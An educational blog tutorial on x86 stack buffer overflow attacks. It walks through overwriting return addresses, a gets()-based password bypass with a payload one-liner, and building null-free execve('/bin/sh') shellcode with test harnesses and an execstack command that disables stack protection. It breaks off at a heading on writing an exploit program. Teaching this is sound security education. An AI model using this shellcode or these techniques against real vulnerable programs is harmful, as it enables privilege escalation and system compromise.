REN

Ph.D. in Computer Science at Rutgers University

Buffer Overflow Attack

Buffer overflow is a classic attack technique: input that is longer than its buffer overwrites adjacent memory in programs written in non-memory-safe languages such as C and C++. In this article, I'll show how to exploit a buffer overflow and how to design an attack payload on the x86 architecture.

First of all, let's recall some basic knowledge about x86: the layout of the activation record. A more detailed description can be found in another post of mine: Function Call with register EBP and ESP in x86. As the picture below shows, when a subroutine is called, the return address (the address of the instruction that will be executed first after the subroutine finishes) and the old value of EBP are pushed onto the stack. When the subroutine finishes, EBP is restored, EIP is loaded with the return address, and the fetch-decode-execute loop continues from there.

   

Modify Return Address

The return address indicates where the program should continue after the subroutine call finishes. Is there any way to alter the return address and change the program's execution flow? The answer is yes! Let's use a little example to see how.

/* test.c */
#include <stdio.h>

int foo(int a) {
	int b = a;
	return b;
}

int main() {
	int i = 3;
	int j = i;
	foo(j);
	j = j + 3;
	printf("j = %d\n", j);
	return 0;
}

This program is quite simple: it prints "j = 6" in the terminal. Our goal is to skip "j = j + 3;" by adding some code to function foo, so that the program prints "j = 3" instead. Based on the stack layout described above, there are two ways to do so:

1) Take advantage of the parameter a: take a pointer to a, move it to where the return address is stored, then increase the return address so that "j = j + 3;" is skipped.

2) Take advantage of the local variable b: take a pointer to b, move it to where the return address is stored, then increase the return address so that "j = j + 3;" is skipped.

To find out how many bytes we need to skip, we compile the program and disassemble it with GDB.

Compile the program with GCC:

gcc -g -m32 -o test test.c

Now we use GDB to disassemble the target program (on x86_64 Linux, compile with the -m32 option):

(gdb) disassemble foo
Dump of assembler code for function foo:
   0x0804840b <+0>:	push   %ebp
   0x0804840c <+1>:	mov    %esp,%ebp
   0x0804840e <+3>:	sub    $0x10,%esp
   0x08048411 <+6>:	mov    0x8(%ebp),%eax
   0x08048414 <+9>:	mov    %eax,-0x4(%ebp)
   0x08048417 <+12>:	mov    -0x4(%ebp),%eax
   0x0804841a <+15>:	leave  
   0x0804841b <+16>:	ret    
End of assembler dump.
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804841c <+0>:	lea    0x4(%esp),%ecx
   0x08048420 <+4>:	and    $0xfffffff0,%esp
   0x08048423 <+7>:	pushl  -0x4(%ecx)
   0x08048426 <+10>:	push   %ebp
   0x08048427 <+11>:	mov    %esp,%ebp
   0x08048429 <+13>:	push   %ecx
   0x0804842a <+14>:	sub    $0x14,%esp
   0x0804842d <+17>:	movl   $0x3,-0x10(%ebp)
   0x08048434 <+24>:	mov    -0x10(%ebp),%eax
   0x08048437 <+27>:	mov    %eax,-0xc(%ebp)
   0x0804843a <+30>:	pushl  -0xc(%ebp)
   0x0804843d <+33>:	call   0x804840b <foo>
   0x08048442 <+38>:	add    $0x4,%esp
   0x08048445 <+41>:	addl   $0x3,-0xc(%ebp)
   0x08048449 <+45>:	sub    $0x8,%esp
   0x0804844c <+48>:	pushl  -0xc(%ebp)
   0x0804844f <+51>:	push   $0x80484f0
   0x08048454 <+56>:	call   0x80482e0 <printf@plt>
   0x08048459 <+61>:	add    $0x10,%esp
   0x0804845c <+64>:	mov    $0x0,%eax
   0x08048461 <+69>:	mov    -0x4(%ebp),%ecx
   0x08048464 <+72>:	leave  
   0x08048465 <+73>:	lea    -0x4(%ecx),%esp
   0x08048468 <+76>:	ret    
End of assembler dump.

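From the disassembly, we can see that foo normally returns to 0x08048442. If we add 10 (0x0a) to the return address, execution resumes at 0x0804844c instead, which skips the addl that implements "j = j + 3;" (along with the two stack-pointer adjustments around it). Now let's change function foo as follows: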

Either using parameter a

int foo(int a) {	// using parameter a
	int b = a;
	int *c = &a - 1;	// now c is pointing to the return address
	*c += 0x0a;		// modify the return address by adding 0x0a to skip "j = j + 3;"
	return b;
}

When running this modified foo, we can see that the program prints "j = 3" instead of 6.

Or using local variable b

int foo(int a) {	// using local variable b
	int b = a + 1;
	int *c = &b + 2;	// now c is pointing to the return address
	*c += 0x0a;		// modify the return address by adding 0x0a to skip "j = j + 3;"
	return b;
}

When running this modified foo, things get strange: the program aborts with a "stack smashing detected" message and dumps core. So what happened here?

Taking a look with gdb, we can see that GCC has put something else on the stack between the local variables and the saved EBP, including the guard value used by the stack protector.

(gdb) x/20xw $ebp
0xffffd228:	0xffffd258	0x080484d1	0x00000003	0x00000007
0xffffd238:	0xf7e33810	0x0804854b	0x00000001	0xffffd304
0xffffd248:	0x00000003	0x00000003	0xf7fb43dc	0xffffd270
0xffffd258:	0x00000000	0xf7e1d637	0xf7fb4000	0xf7fb4000
0xffffd268:	0x00000000	0xf7e1d637	0x00000001	0xffffd304
(gdb) x/20xw $esp
0xffffd210:	0xffffffff	0x0000002f	0xffffd21c	0x5e439b0a
0xffffd220:	0x00008000	0xf7fb4000	0xffffd258	0x080484d1
0xffffd230:	0x00000003	0x00000007	0xf7e33810	0x0804854b
0xffffd240:	0x00000001	0xffffd304	0x00000003	0x00000003
0xffffd250:	0xf7fb43dc	0xffffd270	0x00000000	0xf7e1d637
(gdb) p/x &b
$1 = 0xffffd214

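From the gdb output above, the return address is stored at $ebp + 4 = 0xffffd22c, while b is at 0xffffd214. The return address therefore lies 24 bytes, that is, six 4-byte words, above the local variable b. Thus we make a slight modification to function foo: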

int foo(int a) {	// using local variable b
	int b = a + 1;
	int *c = &b + 6;	// now c is pointing to the return address
	*c += 0x0a;		// modify the return address by adding 0x0a to skip "j = j + 3;"
	return b;
}

This time, we could see the program prints "j = 3" instead of 6.
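
The two numbers used in foo can be re-derived with a few lines of arithmetic. The sketch below is Python 3 and only restates values copied from the listings above: the frame pointer and the address of b from the GDB session, and the two instruction addresses from the first disassembly of main. The variable names are my own.

```python
# Values copied from the GDB session and the disassembly above.
EBP = 0xFFFFD228        # frame pointer of foo (first address printed by x/20xw $ebp)
ADDR_B = 0xFFFFD214     # result of p/x &b
WORD = 4                # sizeof(int) on 32-bit x86

ret_slot = EBP + WORD           # the return address sits just above the saved EBP
byte_gap = ret_slot - ADDR_B    # distance from b to the return address, in bytes
word_gap = byte_gap // WORD     # pointer arithmetic on int* counts in 4-byte words

# Distance between the normal return address and the instruction we resume at.
skip = 0x0804844C - 0x08048442

print(byte_gap, word_gap, hex(skip))
```

Because c is an int pointer, the value added to &b is the word count, not the byte count.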


Stack Buffer Overflow

The previous section showed one way to modify the return address of a subroutine call: we used a parameter or a local variable to locate where the return address is stored. In a real situation, however, a user of a program cannot modify the return address of a function by adding a variable to the source code or by using GDB. So is it hopeless? Don't get frustrated so fast. Consider the following situation: a function has a local char buffer whose content is typed in by the user through stdin. If the buffer is filled by an unsafe function such as gets() or strcpy(), we can type a carefully prepared string that is longer than the buffer and overwrites the return address. We can even make the program execute the bytes we placed in the overwritten buffer. Boom, we made it possible!

Level-1: Altering the Return Address to Change Program Flow

Now let's look at the program bof.c below.

/* bof.c */
#include <stdio.h>
#include <string.h>

static char* password = "12345";

int verify() {
	char input[6] = "";
	gets(input);	
	if (strcmp(input, password))
		return -1;
	else
		return 0;
}

void start() {
	printf("Correct password, Welcome!\n");
}

int main() {
	while(-1 == verify());
	start();	
	return 0;
}

Let's compile this program in GCC: (Make sure to use -fno-stack-protector option when compiling!)

gcc -g -m32 -o bof bof.c -fno-stack-protector

This program performs a password verification: we cannot reach function start until we type in the correct password.

   

We could write a bash script that brute-forces every possible password. But why not use a buffer overflow attack to do the same thing? Let's start:

Step 1: Use objdump to disassemble the ELF executable file and find the address that leads to function start.

0804846b <verify>:
 804846b:	55                   	push   %ebp
 804846c:	89 e5                	mov    %esp,%ebp
 804846e:	83 ec 18             	sub    $0x18,%esp
 8048471:	c7 45 f2 00 00 00 00 	movl   $0x0,-0xe(%ebp)
 8048478:	66 c7 45 f6 00 00    	movw   $0x0,-0xa(%ebp)
 804847e:	83 ec 0c             	sub    $0xc,%esp
 8048481:	8d 45 f2             	lea    -0xe(%ebp),%eax		# Get the address of local input string is ebp - 0x0e
 8048484:	50                   	push   %eax
 8048485:	e8 a6 fe ff ff       	call   8048330 <gets@plt>
 804848a:	83 c4 10             	add    $0x10,%esp
 804848d:	a1 24 a0 04 08       	mov    0x804a024,%eax
 8048492:	83 ec 08             	sub    $0x8,%esp
 8048495:	50                   	push   %eax
 8048496:	8d 45 f2             	lea    -0xe(%ebp),%eax
 8048499:	50                   	push   %eax
 804849a:	e8 81 fe ff ff       	call   8048320 <strcmp@plt>
 804849f:	83 c4 10             	add    $0x10,%esp
 80484a2:	85 c0                	test   %eax,%eax
 80484a4:	74 07                	je     80484ad <verify+0x42>
 80484a6:	b8 ff ff ff ff       	mov    $0xffffffff,%eax
 80484ab:	eb 05                	jmp    80484b2 <verify+0x47>
 80484ad:	b8 00 00 00 00       	mov    $0x0,%eax
 80484b2:	c9                   	leave  
 80484b3:	c3                   	ret    

080484b4 <start>:
 80484b4:	55                   	push   %ebp
 80484b5:	89 e5                	mov    %esp,%ebp
 80484b7:	83 ec 08             	sub    $0x8,%esp
 80484ba:	83 ec 0c             	sub    $0xc,%esp
 80484bd:	68 86 85 04 08       	push   $0x8048586
 80484c2:	e8 79 fe ff ff       	call   8048340 <puts@plt>
 80484c7:	83 c4 10             	add    $0x10,%esp
 80484ca:	90                   	nop
 80484cb:	c9                   	leave  
 80484cc:	c3                   	ret    

080484cd <main>:
 80484cd:	8d 4c 24 04          	lea    0x4(%esp),%ecx
 80484d1:	83 e4 f0             	and    $0xfffffff0,%esp
 80484d4:	ff 71 fc             	pushl  -0x4(%ecx)
 80484d7:	55                   	push   %ebp
 80484d8:	89 e5                	mov    %esp,%ebp
 80484da:	51                   	push   %ecx
 80484db:	83 ec 04             	sub    $0x4,%esp
 80484de:	90                   	nop
 80484df:	e8 87 ff ff ff       	call   804846b <verify>
 80484e4:	83 f8 ff             	cmp    $0xffffffff,%eax
 80484e7:	74 f6                	je     80484df <main+0x12>
 80484e9:	e8 c6 ff ff ff       	call   80484b4 <start>		# The call to start: the address we will return to
 80484ee:	b8 00 00 00 00       	mov    $0x0,%eax
 80484f3:	83 c4 04             	add    $0x4,%esp
 80484f6:	59                   	pop    %ecx
 80484f7:	5d                   	pop    %ebp
 80484f8:	8d 61 fc             	lea    -0x4(%ecx),%esp
 80484fb:	c3                   	ret    
 80484fc:	66 90                	xchg   %ax,%ax
 80484fe:	66 90                	xchg   %ax,%ax

Step 2: Design the input string to overwrite the return address.

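From the disassembly we know both where we want to go and where the input is stored. We want verify to return to 0x080484e9, the call start instruction in main, rather than to 0x080484e4, so that the password check is skipped and main still finishes normally after start returns. To locate the input buffer, recall that the argument of gets must be pushed on the stack before gets is invoked. Right before the call we find lea -0xe(%ebp),%eax followed by push %eax, which means the input buffer starts at ebp - 0x0e. The saved EBP occupies the 4 bytes at ebp and the return address follows at ebp + 4, so the return address is 0x0e + 0x04 = 0x12 (18) bytes past the start of the buffer. We therefore build an input string of 18 filler bytes followed by the new return address in little-endian byte order: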

python -c 'print "a"*18 + "\xe9\x84\x04\x08"' > ./payload

Then just redirect standard input to the payload file I just created.
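
The one-liner above uses Python 2 syntax. As a rough sketch, the same payload can be built in Python 3 with struct.pack, which makes the little-endian byte order explicit. The constant and function names are my own; the values come from the objdump listing of bof.

```python
import struct

BUF_OFFSET = 0x0E       # input[] starts at ebp - 0x0e (from the lea before gets)
SAVED_EBP_SIZE = 4      # the saved EBP sits between the buffer and the return address
TARGET = 0x080484E9     # address of the "call start" instruction in main


def build_payload() -> bytes:
    """Return the filler bytes followed by the new return address."""
    padding = b"a" * (BUF_OFFSET + SAVED_EBP_SIZE)    # 18 filler bytes
    return padding + struct.pack("<I", TARGET)        # 32-bit little-endian address


payload = build_payload()
print(payload.hex())
# To save it for redirection, one option is:
#   open("payload", "wb").write(payload + b"\n")
```

Writing the file in binary mode matters in Python 3, since printing the bytes as text would re-encode the non-ASCII address bytes.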

   


Level-2: Inject Code into Buffer to Spawn Shell

Level-1 just altered the return address to skip the password verification. Can we go further? Since we control the return address, we would like to point it at a malicious program of our own. But two programs live in different address spaces, so we cannot jump from one into the other. Instead, we overwrite the buffer with instructions we created and make the return address point to those instructions. If the vulnerable program is a setuid-root program, the shell spawned by those instructions is a root shell.

Step 1: Design a shell code to get root privilege

The path of the shell is "/bin/sh". To execute the shell, we can invoke the execve system call, and to invoke a system call we need to trap into the kernel. On x86, interrupt vectors 0x00 to 0x1F are reserved by the processor for exceptions, while vectors 0x20 to 0xFF are assigned by the operating system, so different OSes have different interrupt vector tables. On 32-bit x86 Linux, a system call is made with INT 0x80, and the system call number of execve is 0x0b. It may be hard to write shell code in assembly directly, so we first write a C version of the shell code and use objdump or GDB to see what the compiler generates for it.

Here's the C code for running a shell:

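/* spawn.c */
#include <stdio.h>
#include <unistd.h>

int main(void) {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);	/* replaces this process with /bin/sh */
   return 1;			/* reached only if execve fails */
}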

Let's compile this program in GCC: (Make sure to use the -fno-plt option on an earlier version of GCC when compiling!)

gcc -g -m32 -o spawn spawn.c -fno-plt

Now, see how GCC made it by using gdb:

(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:	pushl  %ebp
0x8000131 <main+1>:	movl   %esp,%ebp
0x8000133 <main+3>:	subl   $0x8,%esp
0x8000136 <main+6>:	movl   $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>:	movl   $0x0,0xfffffffc(%ebp)
0x8000144 <main+20>:	pushl  $0x0
0x8000146 <main+22>:	leal   0xfffffff8(%ebp),%eax
0x8000149 <main+25>:	pushl  %eax
0x800014a <main+26>:	movl   0xfffffff8(%ebp),%eax
0x800014d <main+29>:	pushl  %eax
0x800014e <main+30>:	call   0x80002bc <__execve>
0x8000153 <main+35>:	addl   $0xc,%esp
0x8000156 <main+38>:	movl   %ebp,%esp
0x8000158 <main+40>:	popl   %ebp
0x8000159 <main+41>:	ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>:	pushl  %ebp
0x80002bd <__execve+1>:	movl   %esp,%ebp
0x80002bf <__execve+3>:	pushl  %ebx
0x80002c0 <__execve+4>:	movl   $0xb,%eax
0x80002c5 <__execve+9>:	movl   0x8(%ebp),%ebx
0x80002c8 <__execve+12>:	movl   0xc(%ebp),%ecx
0x80002cb <__execve+15>:	movl   0x10(%ebp),%edx
0x80002ce <__execve+18>:	int    $0x80
0x80002d0 <__execve+20>:	movl   %eax,%edx
0x80002d2 <__execve+22>:	testl  %edx,%edx
0x80002d4 <__execve+24>:	jnl    0x80002e6 <__execve+42>
0x80002d6 <__execve+26>:	negl   %edx
0x80002d8 <__execve+28>:	pushl  %edx
0x80002d9 <__execve+29>:	call   0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>:	popl   %edx
0x80002df <__execve+35>:	movl   %edx,(%eax)
0x80002e1 <__execve+37>:	movl   $0xffffffff,%eax
0x80002e6 <__execve+42>:	popl   %ebx
0x80002e7 <__execve+43>:	movl   %ebp,%esp
0x80002e9 <__execve+45>:	popl   %ebp
0x80002ea <__execve+46>:	ret
0x80002eb <__execve+47>:	nop
End of assembler dump.

The definition of execve is:

int execve(const char *filename, char *const argv[], char *const envp[]);

From the assembly code and from what we discussed above, we can see what is needed to invoke the execve system call: put the system call number 0x0b in EAX, the address of the file name string in EBX, the address of the argv array (whose first element is the address of the file name string and whose last element is NULL) in ECX, and the address of the envp array (here, the address of a NULL word) in EDX. Moreover, if we also invoke the exit system call afterwards, the program exits cleanly even when execve fails, instead of running on into whatever bytes follow and crashing. Now we can build our shell code.

movl	$0xb, %eax			# set system call number
movl	(address of "/bin/sh"), %ebx
leal	(address of the pointer to "/bin/sh"), %ecx
leal	(address of the NULL word), %edx
int	$0x80				# make execve system call
movl	$0x1, %eax
movl	$0x0, %ebx
int	$0x80				# make exit system call
.string "/bin/sh"

The problem we face now is that we don't know the address of the string "/bin/sh" when we design the shell code, because it is only known at run time. Is there a way around this? Absolutely! Remember the x86 function call mechanism: a call instruction pushes its return address, the address of whatever follows the call, onto the stack. Thus, if we put a call instruction right before the "/bin/sh" string, the address of the string is pushed onto the stack, and we can use pop to get it. The shell code then looks like this:

	jmp dummy
start:	popl	%esi			# get the address of "/bin/sh"
	movl	%esi, 0x8(%esi)		# storing the address of "/bin/sh" in memory
	movb	$0x0, 0x7(%esi)		# set '\0' to the end of "/bin/sh"
	movl	$0x0, 0xc(%esi) 	# address 0x0 used for NULL pointer
	movl	$0xb, %eax
	movl	%esi, %ebx
	leal	0x8(%esi), %ecx
	leal	0xc(%esi), %edx
	int	$0x80			# make execve system call
	movl	$0x1, %eax
	movl	$0x0, %ebx
	int	$0x80			# make exit system call
dummy:	call start 
	.string "/bin/sh"
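
To see what the three stores at the top of the shell code build in memory, here is a small Python 3 model of the 16 bytes starting at %esi. It is only an illustration: the runtime address passed in is hypothetical, and the function name is my own. The offsets 0x7, 0x8 and 0xc are the ones used in the listing above.

```python
import struct


def data_area(esi: int) -> bytes:
    """Model the 16 bytes starting at %esi after the three stores have run."""
    area = bytearray(b"/bin/sh" + b"?" * 9)    # bytes after the string are unknown at first
    area[0x8:0xC] = struct.pack("<I", esi)     # movl %esi, 0x8(%esi): argv[0] = address of the string
    area[0x7] = 0x00                           # movb $0x0, 0x7(%esi): terminate "/bin/sh"
    area[0xC:0x10] = struct.pack("<I", 0)      # movl $0x0, 0xc(%esi): argv[1] = NULL, also used as envp
    return bytes(area)


area = data_area(0xFFFFD200)    # hypothetical runtime address of the string
print(area.hex())
```

In this layout EBX points at offset 0 (the file name), ECX at offset 0x8 (the argv array) and EDX at offset 0xc (the NULL word), which matches the registers loaded before int $0x80.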

Now we put it into an assembly file, payload.s:

.section .data
.section .text
.globl _start

_start:
	jmp	dummy
start:	popl	%esi
	movl	%esi, 0x8(%esi)
	movb	$0x0, 0x7(%esi)
	movl	$0x0, 0xc(%esi)
	movl	$0xb, %eax
	movl	%esi, %ebx
	leal	0x8(%esi), %ecx
	leal	0xc(%esi), %edx
	int	$0x80			
	movl	$0x1, %eax
	movl	$0x0, %ebx
	int	$0x80			
dummy:	call start 
	.string "/bin/sh"

Let's assemble and link this assembly code: (Make sure to use the -m elf_i386 option when linking!)

as --32 payload.s -o payload.o && ld -m elf_i386 -o payload payload.o

Now we use objdump to get the machine code bytes of those instructions:

08048054 <_start>:
 8048054:	eb 2a                	jmp    8048080 <dummy>

08048056 <start>:
 8048056:	5e                   	pop    %esi
 8048057:	89 76 08             	mov    %esi,0x8(%esi)
 804805a:	c6 46 07 00          	movb   $0x0,0x7(%esi)
 804805e:	c7 46 0c 00 00 00 00 	movl   $0x0,0xc(%esi)
 8048065:	b8 0b 00 00 00       	mov    $0xb,%eax
 804806a:	89 f3                	mov    %esi,%ebx
 804806c:	8d 4e 08             	lea    0x8(%esi),%ecx
 804806f:	8d 56 0c             	lea    0xc(%esi),%edx
 8048072:	cd 80                	int    $0x80
 8048074:	b8 01 00 00 00       	mov    $0x1,%eax
 8048079:	bb 00 00 00 00       	mov    $0x0,%ebx
 804807e:	cd 80                	int    $0x80

08048080 <dummy>:
 8048080:	e8 d1 ff ff ff       	call   8048056 <start>
 8048085:	2f                   	das    
 8048086:	62 69 6e             	bound  %ebp,0x6e(%ecx)
 8048089:	2f                   	das    
 804808a:	73 68                	jae    80480f4 <dummy+0x74>
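
Two details of this dump are worth checking by hand. First, jmp and call use displacements relative to the address of the next instruction, which is why the code works wherever it is loaded. Second, the das, bound and jae lines at the end are not real instructions: objdump is decoding the bytes of the string "/bin/sh". The Python 3 sketch below verifies both, using only bytes and addresses from the dump; the helper name is my own.

```python
import struct


def rel_target(next_insn_addr: int, disp_bytes: bytes) -> int:
    """Target of a relative jmp/call: next instruction address plus a signed displacement."""
    fmt = "<b" if len(disp_bytes) == 1 else "<i"    # 8-bit or 32-bit signed, little-endian
    (disp,) = struct.unpack(fmt, disp_bytes)
    return (next_insn_addr + disp) & 0xFFFFFFFF


jmp_target = rel_target(0x08048056, bytes.fromhex("2a"))           # eb 2a at 0x8048054
call_target = rel_target(0x08048085, bytes.fromhex("d1ffffff"))    # e8 d1 ff ff ff at 0x8048080
trailing = bytes.fromhex("2f62696e2f7368").decode("ascii")         # bytes after the call

print(hex(jmp_target), hex(call_target), trailing)
```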

Now let's test our shell code, using a local variable to locate the return address:

/* testshellcode.c */
#include <stdio.h>

char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3"
				   "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80"
				   "\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main() {

	int *ret;
	ret = (int *)&ret + 2;	/* step from ret's own address up to the return address */
	*ret = (int)shellcode;

	return 0;
}

The code above is adapted from Aleph One's classic article on buffer overflow attacks, "Smashing the Stack for Fun and Profit". Note that using a local variable to locate the return address may not work with some compilers, because the stack frame layout differs. Thus, it's preferable to call the shell code through a function pointer:

/* testshellcode.c */
#include <stdio.h>

char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3"
				   "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80"
				   "\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main() {

	int (*func)();
	func = (int (*)()) shellcode;
	(int)(*func)();

	return 0;
}

Now, let's compile it with GCC

gcc -g -m32 -o testshellcode testshellcode.c

The result is a segmentation fault. Eventually I found that there is already a mechanism that protects against this kind of attack: non-executable memory. Modern systems mark the stack, and other data memory such as the array holding our shell code, as non-executable, so jumping into it faults. In the mid-1990s, when Aleph One's classic article was written, buffer overflow attacks were a rather "new" method; some of the code and methods used in that article no longer work because those weaknesses have since been fixed in the operating system or in the compiler. System security changes rapidly, and we always need to learn something new.

   

So, we need to install a package that lets us re-enable execution for this program: the execstack -s command sets the executable-stack flag in the ELF file.

sudo apt-get install execstack && execstack -s testshellcode && ./testshellcode

   

Now we get the shell. It is not a root shell here because this program is not a setuid-root program: it is not owned by root with the setuid bit set.

As Aleph One's article points out, the shell code we just created contains several null bytes, and string functions such as strcpy() treat a null byte as the end of the string, so the rest of the payload would never be copied. Thus, it's preferable to use null-free shell code. To achieve this, we replace the offending instructions with equivalent ones:

.section .data
.section .text
.globl _start

_start:
	jmp	dummy
start:	popl	%esi
	movl	%esi, 0x8(%esi)
	xorl	%eax, %eax		# newly added: EAX = 0
	movb	%al, 0x7(%esi)		# replaces movb	$0x0, 0x7(%esi)
	movl	%eax, 0xc(%esi)		# replaces movl	$0x0, 0xc(%esi)
	movb	$0xb, %al		# replaces movl	$0xb, %eax
	movl	%esi, %ebx
	leal	0x8(%esi), %ecx
	leal	0xc(%esi), %edx
	int	$0x80
	xorl	%ebx, %ebx		# replaces movl	$0x0, %ebx
	movl	%ebx, %eax		# together with inc, replaces movl $0x1, %eax
	inc	%eax
	int	$0x80			
dummy:	call start 
	.string "/bin/sh"

Now we use objdump to get the machine code bytes of those instructions:

08048054 <_start>:
 8048054:	eb 1f                	jmp    8048075 <dummy>

08048056 <start>:
 8048056:	5e                   	pop    %esi
 8048057:	89 76 08             	mov    %esi,0x8(%esi)
 804805a:	31 c0                	xor    %eax,%eax
 804805c:	88 46 07             	mov    %al,0x7(%esi)
 804805f:	89 46 0c             	mov    %eax,0xc(%esi)
 8048062:	b0 0b                	mov    $0xb,%al
 8048064:	89 f3                	mov    %esi,%ebx
 8048066:	8d 4e 08             	lea    0x8(%esi),%ecx
 8048069:	8d 56 0c             	lea    0xc(%esi),%edx
 804806c:	cd 80                	int    $0x80
 804806e:	31 db                	xor    %ebx,%ebx
 8048070:	89 d8                	mov    %ebx,%eax
 8048072:	40                   	inc    %eax
 8048073:	cd 80                	int    $0x80

08048075 <dummy>:
 8048075:	e8 dc ff ff ff       	call   8048056 <start>
 804807a:	2f                   	das    
 804807b:	62 69 6e             	bound  %ebp,0x6e(%ecx)
 804807e:	2f                   	das    
 804807f:	73 68                	jae    80480e9 <dummy+0x74>

Now put the new bytes into the test program:

/* testshellcode.c */
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
				   "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
				   "\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main() {

	int (*func)();
	func = (int (*)()) shellcode;
	(int)(*func)();

	return 0;
}

Now, let's compile it with GCC

gcc -g -m32 -o testshellcode testshellcode.c && execstack -s testshellcode && ./testshellcode

This time, we get the shell again.
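
A quick way to confirm that the rewrite removed every null byte is to scan both byte strings. The Python 3 sketch below copies the two shell codes from the listings above as hex; the function name and the forbidden parameter are my own. Note that gets() stops at a newline (0x0a) rather than at a null byte, so the same check can be rerun with a different set of forbidden bytes.

```python
FIRST = bytes.fromhex(
    "eb2a5e897608c6460700c7460c00000000b80b00000089f3"
    "8d4e088d560ccd80b801000000bb00000000cd80"
    "e8d1ffffff2f62696e2f7368"
)
SECOND = bytes.fromhex(
    "eb1f5e89760831c088460789460cb00b89f3"
    "8d4e088d560ccd8031db89d840cd80"
    "e8dcffffff2f62696e2f7368"
)


def bad_offsets(code: bytes, forbidden: bytes = b"\x00") -> list:
    """Return the offsets of every byte in code that appears in forbidden."""
    return [i for i, byte in enumerate(code) if byte in forbidden]


print(len(FIRST), len(bad_offsets(FIRST)))
print(len(SECOND), len(bad_offsets(SECOND)))
print(bad_offsets(SECOND, forbidden=b"\x00\x0a"))
```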

   


Step 2: Detect Return Address

Now we have shell code that can spawn a root shell. The problem we face when deploying a stack smashing attack is that we don't know the offset from the string we're overwriting to the return address, so we don't know where the return address is. There are several methods to find this location.

Method 1: Find Evidence by Guessing or Disassembling the Target Program

This is the easiest way. Guessing is possible because, on systems that do not randomize the address space, the stack of every program starts at the same virtual address thanks to the virtual memory mechanism, and most programs do not push more than a few hundred or a few thousand bytes onto the stack at any one time. Virtual memory isolates processes from each other to provide memory protection but, in my opinion, it also makes stack smashing attacks easier to carry out, which is quite interesting. Still, blind guessing is not a good choice. For simple programs, we can use a disassembler such as objdump to get the assembly code of the target program and look for evidence there. I'm going to reuse the example from the last section:

/* bof.c */
#include <stdio.h>
#include <string.h>

static char* password = "12345";

int verify() {
	char input[6] = "";
	gets(input);	
	if (strcmp(input, password))
		return -1;
	else
		return 0;
}

void start() {
	printf("Correct password, Welcome!\n");
}

int main() {
	while(-1 == verify());
	start();	
	return 0;
}

Use objdump to disassemble the ELF executable file.

0804846b <verify>:
 804846b:	55                   	push   %ebp
 804846c:	89 e5                	mov    %esp,%ebp
 804846e:	83 ec 18             	sub    $0x18,%esp
 8048471:	c7 45 f2 00 00 00 00 	movl   $0x0,-0xe(%ebp)
 8048478:	66 c7 45 f6 00 00    	movw   $0x0,-0xa(%ebp)
 804847e:	83 ec 0c             	sub    $0xc,%esp
 8048481:	8d 45 f2             	lea    -0xe(%ebp),%eax		# Get the address of local input string is ebp - 0x0e
 8048484:	50                   	push   %eax
 8048485:	e8 a6 fe ff ff       	call   8048330 <gets@plt>	# Invoke gets()
 804848a:	83 c4 10             	add    $0x10,%esp
   ...
 80484ad:	b8 00 00 00 00       	mov    $0x0,%eax
 80484b2:	c9                   	leave  
 80484b3:	c3                   	ret    

080484b4 <start>:
 80484b4:	55                   	push   %ebp
 80484b5:	89 e5                	mov    %esp,%ebp
   ...
 80484cb:	c9                   	leave  
 80484cc:	c3                   	ret    

080484cd <main>:
 80484cd:	8d 4c 24 04          	lea    0x4(%esp),%ecx
 80484d1:	83 e4 f0             	and    $0xfffffff0,%esp
   ...
 80484fb:	c3                   	ret    
 80484fc:	66 90                	xchg   %ax,%ax
 80484fe:	66 90                	xchg   %ax,%ax

From the assembly code above, we know that the address of the string we want to overwrite must be pushed onto the stack before gets is invoked, because that is how arguments are passed in an x86 function call. Tracing back a few instructions from the call, we find lea -0xe(%ebp),%eax, so the string we are looking for starts at ebp - 0x0e. This string is a local variable of function verify(), and the return address of verify() is stored at ebp + 0x04, so the offset from the start of the string to the return address is 0x0e + 0x04 = 0x12.
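
The effect of that offset can be modelled without touching a real process. The Python 3 sketch below treats the top of verify's frame as a bytearray that starts at the input buffer, and copies data into it without a length check, the way gets() would. The saved EBP value and the helper names are made up for illustration; the two code addresses come from the disassembly of main.

```python
import struct

BUF_TO_EBP = 0x0E                  # input[] starts at ebp - 0x0e
RET_SLOT = BUF_TO_EBP + 4          # saved EBP (4 bytes) comes first, then the return address

# Model: buffer area + saved EBP + return address + 4 bytes of the caller's frame.
frame = bytearray(BUF_TO_EBP + 4 + 4 + 4)
struct.pack_into("<I", frame, BUF_TO_EBP, 0xFFFFD258)    # hypothetical saved EBP
struct.pack_into("<I", frame, RET_SLOT, 0x080484E4)      # normal return address in main


def unbounded_copy(dst: bytearray, data: bytes) -> None:
    """Copy data to the start of dst with no length check, then append a NUL."""
    for i, byte in enumerate(data + b"\x00"):
        dst[i] = byte


payload = b"a" * RET_SLOT + struct.pack("<I", 0x080484E9)
unbounded_copy(frame, payload)

(saved_ebp,) = struct.unpack_from("<I", frame, BUF_TO_EBP)
(new_ret,) = struct.unpack_from("<I", frame, RET_SLOT)
print(hex(RET_SLOT), hex(saved_ebp), hex(new_ret))
```

In the model, the saved EBP is clobbered by filler bytes and the return address slot ends up holding the address we chose.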

   

Method 2: Write an Exploiting Program

